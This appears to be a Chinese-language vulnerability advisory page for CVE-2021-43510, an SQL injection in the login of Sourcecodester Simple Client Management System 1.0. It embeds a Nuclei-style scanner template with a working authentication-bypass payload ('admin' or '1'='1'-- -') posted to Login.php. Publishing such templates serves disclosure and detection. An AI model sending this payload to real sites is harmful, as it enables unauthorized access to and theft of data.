CVE-2021-43510: Sourcecodester Simple Client Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Sourcecodester Simple Client Management System 1.0 | POC: 已公开

漏洞描述

Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2021-43510

info:
  name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0.
  reference:
    - https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
    - https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43510
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/r4hn1/Simple-Client-Management-System-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-43510
    cwe-id: CWE-89
    epss-score: 0.67767
    epss-percentile: 0.98537
    cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simple_client_management_system_project
    product: simple_client_management_system
  tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project

http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3d'1'--+-&password=as
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'contains(header_1, "text/html")'
          - 'status_code_1 == 200'
          - 'contains(body_1, "{\"status\":\"success\"}")'
          - 'contains(body_2, "Welcome to Simple Client")'
        condition: and
# digest: 490a00463044022011ff04bdc7d9a7a4cdcafe1a7fff79e625839a10ac9b072f6f4eb1e67d41e41702203feaef5694a8e264845f0cb6c4c845efda742df5910a49a288baee26c1bf9052:922c64590222798bb761d5b6d8e72950